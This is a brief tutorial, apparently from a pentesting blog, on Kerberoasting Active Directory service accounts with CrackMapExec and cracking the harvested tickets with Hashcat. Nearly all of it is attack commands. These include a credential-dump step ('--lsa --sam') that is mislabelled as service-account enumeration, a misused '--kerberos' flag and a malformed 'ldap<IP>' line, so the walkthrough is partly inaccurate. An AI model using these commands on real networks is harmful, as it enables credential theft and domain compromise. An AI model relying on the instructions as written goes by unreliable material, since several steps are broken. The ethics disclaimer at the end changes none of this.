Kerberoasting is a type of attack that exploits the way Microsoft Active Directory handles service accounts. In this article, we will explore how to perform Kerberoasting with CrackMapExec, a powerful penetration testing tool. We will cover the basics of Kerberos authentication, how Kerberoasting works, and how to use CrackMapExec to extract Kerberos tickets and crack them.
The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts.
Enumerate service accounts with CrackMapExec
crackmapexec smb <IP> -u <username> -p <password> --lsa --sam
Use CrackMapExec to request a TGS for a service account
crackmapexec smb <IP> -u <username> -p <password> --kerberos <SPN>
Extract the encrypted Kerberos ticket with CrackMapExec
crackmapexec ldap<IP> -u <User> -p <Password> --kdcHost <Host> --kerberoasting KERBEROASTING
Crack the encrypted Kerberos ticket with Hashcat
hashcat -m 13100 <ticket_file> <wordlist_file>
hashcat -m13100 output.txt wordlist.txt
Note: Hashcat is not included in CrackMapExec and needs to be installed separately.
By following these steps, you can easily perform Kerberoasting with CrackMapExec and extract Kerberos tickets from service accounts. Remember, always use penetration testing tools ethically and with permission, and never use them to harm or exploit others.
Read the Full CrackMapExec Guide Here: A Swiss Army knife for Pentesting networks